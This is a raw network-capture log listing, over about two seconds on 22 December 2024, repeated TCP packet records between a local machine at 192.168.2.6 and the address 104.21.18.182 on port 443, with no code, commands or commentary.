                                                                                                            Dec 22, 2024 13:42:19.842602968 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.842613935 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.842654943 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.847784996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.847822905 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.847856045 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.847862959 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.847898960 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.847918987 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.849232912 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.849291086 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.853502989 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.853549004 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.853579044 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.853585005 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.853638887 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.853759050 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.853817940 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.857975006 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.858021021 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.858038902 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.858047009 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.858081102 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.858095884 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.858737946 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.858786106 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.862838984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.862883091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.862910986 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.862915993 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.862942934 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.862966061 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:19.864573002 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:19.864628077 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.017761946 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.017782927 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.017848969 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.017860889 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.017904043 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.023607016 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.023633003 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.023675919 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.023684978 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.023734093 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.028584957 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.028600931 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.028713942 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.028728962 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.028780937 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.034480095 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.034496069 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.034589052 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.034604073 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.034657955 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.040118933 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.040136099 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.040199041 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.040214062 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.040270090 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.045556068 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.045573950 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.045635939 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.045650005 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.045712948 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.051553965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.051570892 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.051640987 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.051661968 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.051687956 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.051799059 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.056978941 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.056997061 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.057097912 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.057112932 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.057173014 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.210309982 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.210333109 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.210434914 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.210464954 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.210483074 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.210511923 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.215246916 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.215264082 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.215332985 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.215341091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.215409994 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.221071005 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.221086025 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.221142054 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.221149921 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.221195936 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.226943016 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.226960897 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.227030039 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.227036953 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.227076054 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.231900930 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.231916904 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.232003927 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.232017994 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.232069969 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.238095999 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.238111973 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.238193989 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.238205910 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.238238096 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.238259077 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.243915081 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.243932009 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.244007111 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.244029045 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.244097948 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.248985052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.249001026 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.249039888 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.249063969 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.249098063 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.249201059 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.402771950 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.402791023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.402863979 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.402929068 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.402982950 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.407704115 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.407721043 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.407788038 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.407804012 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.407845020 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.413757086 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.413773060 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.413837910 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.413851976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.413897991 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.419678926 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.419693947 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.419755936 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.419770002 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.419827938 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.425194979 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.425210953 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.425282955 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.425297022 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.425354004 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.430457115 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.430474043 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.430557966 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.430572987 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.430632114 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.435493946 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.435509920 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.435571909 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.435585976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.435645103 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.441919088 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.441935062 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.441998005 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.442012072 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.442070007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.594837904 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.594865084 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.594923973 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.594944000 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.594996929 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.594996929 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.600375891 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.600392103 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.600457907 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.600472927 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.600528955 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.605905056 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.605921030 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.605992079 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.606007099 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.606070042 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.611452103 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.611468077 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.611531019 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.611545086 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.611597061 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.617254972 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.617275000 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.617332935 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.617347956 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.617389917 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.622725010 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.622740984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.622798920 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.622813940 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.622862101 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.628086090 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.628102064 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.628146887 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.628160954 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.628204107 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.628221035 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.633692980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.633708954 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.633764982 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.633779049 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.633833885 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.787034035 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.787053108 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.787122011 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.787142038 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.787195921 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.787195921 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.792828083 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.792846918 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.792915106 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.792922974 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.792978048 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.798608065 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.798624992 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.798686981 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.798695087 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.798736095 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.803500891 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.803518057 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.803580046 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.803587914 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.803613901 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.803642035 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.809356928 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.809372902 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.809438944 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.809448004 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.809494972 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.814723969 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.814739943 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.814798117 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.814806938 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.814826012 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.814851999 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.820533991 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.820550919 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.820580006 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.820607901 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.820620060 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.820652008 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.826343060 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.826378107 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.826410055 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.826419115 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.826458931 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.979052067 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.979073048 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.979149103 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.979162931 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.979213953 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.985014915 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.985047102 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.985088110 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.985096931 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.985132933 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.985157967 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.990607023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.990624905 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.990674973 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.990683079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.990712881 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.990734100 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.995712996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.995728970 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.995790005 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:20.995798111 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:20.995852947 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.001518965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.001534939 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.001594067 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.001602888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.001642942 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.006962061 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.006979942 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.007044077 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.007052898 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.007127047 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.012833118 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.012850046 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.012908936 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.012923956 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.012988091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.018393040 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.018410921 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.018486977 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.018496037 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.018539906 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.171652079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.171672106 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.171751976 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.171763897 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.171803951 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.177563906 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.177582979 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.177633047 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.177642107 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.177694082 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.183202028 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.183218956 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.183280945 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.183289051 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.183324099 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.188657999 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.188676119 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.188752890 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.188760996 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.188802004 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.194228888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.194247007 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.194308043 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.194315910 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.194356918 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.199517965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.199541092 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.199596882 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.199606895 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.199645042 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.205451965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.205467939 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.205523968 CET49720443192.168.2.6104.21.18.182
